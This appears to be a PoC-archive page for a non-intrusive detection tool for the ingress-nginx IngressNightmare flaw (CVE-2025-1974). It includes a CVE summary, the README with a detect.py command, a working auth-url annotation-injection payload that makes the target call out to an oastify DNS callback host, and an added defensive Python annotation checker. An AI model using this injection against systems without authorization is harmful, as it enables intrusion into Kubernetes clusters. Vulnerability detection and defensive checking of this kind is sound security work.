Associated vulnerability
Title:
Kubernetes ingress-nginx security vulnerability
(CVE-2025-1974)
Description: Kubernetes ingress-nginx is the Cloud Native Computing Foundation's open-source ingress controller for Kubernetes; it uses NGINX as a reverse proxy and load balancer. Kubernetes ingress-nginx contains a security vulnerability: under certain conditions, an unauthenticated attacker with access to the pod network can execute arbitrary code in the context of the ingress-nginx controller, potentially leading to the disclosure of Secrets.
Description
Proof-of-Concept Tool to detect IngressNightmare (CVE-2025-1974) via (non-intrusive) active means.
Introduction
# IngressNightmare Detection Tool
## Overview
This tool provides a non-intrusive detection capability for the IngressNightmare vulnerability chain ([CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974)) affecting Ingress NGINX Controller. It specifically leverages the auth-url annotation injection vector ([CVE-2025-24514](https://nvd.nist.gov/vuln/detail/CVE-2025-24514)) to verify the presence of this critical vulnerability without executing arbitrary code.
## Technical Background
The IngressNightmare vulnerability chain allows attackers to inject arbitrary NGINX configuration directives through various Ingress annotation fields. When these malicious Ingress resources are processed by the admission controller, the injected directives are evaluated during the NGINX configuration validation phase (`nginx -t`).
This PoC specifically exploits the `auth-url` annotation vulnerability by injecting the `error_log` directive with a syslog server pointing to an attacker-controlled domain. During configuration validation, NGINX will:
1. Parse the injected configuration
2. Resolve the specified domain via DNS
This DNS resolution activity provides a reliable signal that the target is vulnerable without requiring code execution or service disruption.
## Usage
1. Establish a DNS callback listener using Burp Collaborator, interactsh, or any DNS monitoring service.
2. Execute the detection tool:
```shell
$ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com
```
3. If vulnerable, you will observe DNS resolution attempts to your DNS callback domain.

## Detection Methodology
The tool crafts a specially formed AdmissionReview object containing an Ingress resource with the following injection payload:
```yaml
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"
```
This payload:
- Uses the comment character (`#`) to terminate the URL
- Injects a newline followed by a resolver directive
- Adds the `error_log` directive with syslog pointing to the DNS callback domain
- Comments out the remainder to maintain syntactic validity
When processed by a vulnerable admission controller, this results in an outbound DNS lookup that confirms the presence of the vulnerability.
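As an added example (not part of this tool or the original README), the following Python check takes the defender's side of the same annotation: it inspects the `auth-url` annotation of the Ingress carried in an AdmissionReview and flags the breakout characters and smuggled directives the payload above relies on. The AdmissionReview layout, the `make_review` helper and the benign sample value are constructed here; the malicious sample is the payload shown above.

```python
import re
from urllib.parse import urlparse

AUTH_URL_ANNOTATION = "nginx.ingress.kubernetes.io/auth-url"

# Characters a legitimate auth-url never needs, but which let a value break out of
# the directive ingress-nginx generates from it: newlines, the '#' comment marker,
# the ';' directive terminator and block braces.
BREAKOUT_CHARS = re.compile(r"[\r\n#;{}]")
# Directives the IngressNightmare payload smuggles in through the annotation.
SUSPECT_DIRECTIVES = re.compile(r"\b(error_log|resolver|ssl_engine|load_module)\b")


def audit_auth_url(value):
    """Return the list of findings for one auth-url annotation value ([] if clean)."""
    findings = []
    if BREAKOUT_CHARS.search(value):
        findings.append("breakout characters in auth-url")
    if SUSPECT_DIRECTIVES.search(value):
        findings.append("NGINX directive embedded in auth-url")
    parsed = urlparse(value)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        findings.append("auth-url is not a plain http(s) URL")
    return findings


def audit_admission_review(review):
    """Audit the Ingress carried in an AdmissionReview; returns findings, [] if none."""
    obj = review.get("request", {}).get("object", {})
    annotations = obj.get("metadata", {}).get("annotations", {}) or {}
    value = annotations.get(AUTH_URL_ANNOTATION)
    return [] if value is None else audit_auth_url(value)


def make_review(auth_url):
    """Constructed AdmissionReview wrapping an Ingress with the given auth-url (sample data)."""
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
            "request": {"object": {"apiVersion": "networking.k8s.io/v1", "kind": "Ingress",
                                   "metadata": {"name": "probe",
                                                "annotations": {AUTH_URL_ANNOTATION: auth_url}}}}}


# The payload from the README above; "\n" here is a real newline, as YAML would produce.
MALICIOUS = make_review("http://example.com/#;\n resolver 8.8.8.8;\n"
                        " error_log syslog:server=unique-id.oastify.com:80 debug;\n #")
BENIGN = make_review("https://auth.example.com/verify")  # constructed benign value

if __name__ == "__main__":
    for name, review in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(name, audit_admission_review(review) or ["no findings"])
```

The same check can run over `kubectl get ingress -A -o json` output by feeding each item's `metadata.annotations` to `audit_auth_url`.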
## Limitations
This tool only detects the presence of the vulnerability and does not attempt to exploit it for arbitrary code execution.
## Credits
https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
File snapshot
[4.0K] /data/pocs/6e2e313a2110bf5ccfddbd5f8d3cba307e5bfbca
├── [3.1K] detect.py
├── [1.3K] poc.json
├── [ 88K] poc.png
└── [2.5K] README.md
0 directories, 4 files
Notes
1. We recommend accessing the PoC through its original source first.
2. If the source has gone offline or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.